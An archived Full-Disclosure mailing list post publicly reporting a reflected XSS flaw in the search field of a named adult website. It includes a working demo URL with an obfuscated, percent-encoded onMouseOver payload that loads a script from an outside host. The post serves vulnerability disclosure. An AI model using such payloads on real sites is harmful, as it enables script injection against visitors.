[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS parameter injection in the search field of http://chicasdetorbe.com

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] XSS parameter injection in the search field of http://chicasdetorbe.com
From: klondike <klondike@xxxxxxxxxxxx>
Date: Sat, 21 Apr 2012 05:05:31 +0200

Hello,
Yesterday I discovered a funny XSS injection in the website
http://chicasdetorbe.com which is an affiliate site of the popular
website http://www.putalocura.com/

Despite my efforts at contacting with the site owner I received silence
as answer, I suppose because he though this was either not serious or he
just wanted to ignore me. Thus after the having sent various warnings of
Full Disclosure I have decided to publish the whole thing.

The vulnerability:
The vulnerability is quite simple, the contents of the search string are
pasted escaping characters like ' " and \ inside the value field of the
input thus you can insert which ever attributes you want which allows
for event based injection as long as you don't use the characters ' " or
\ since they will be escaped with an extra \.

Take into account that even if they tried to detect dangerous strings
this would be bypasable by adding <> since those are removed by the
content manager.

The demo (the site is NSFW so be careful):
1. Go to:
http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F
(You may need to copy and paste the whole link).
2.Put the mouse over the search bar on the top left.
3. Enjoy! (The text is in Spanish and basically offer links to free porn
and photos of chonis: a social group in Spain).

klondike

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] DoS vulnerability in WordPress
Next by Date: [Full-disclosure] [ MDVSA-2012:061 ] raptor
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2455-1] typo3-src security update
Next by thread: [Full-disclosure] [ MDVSA-2012:061 ] raptor
Index(es):
- Date
- Thread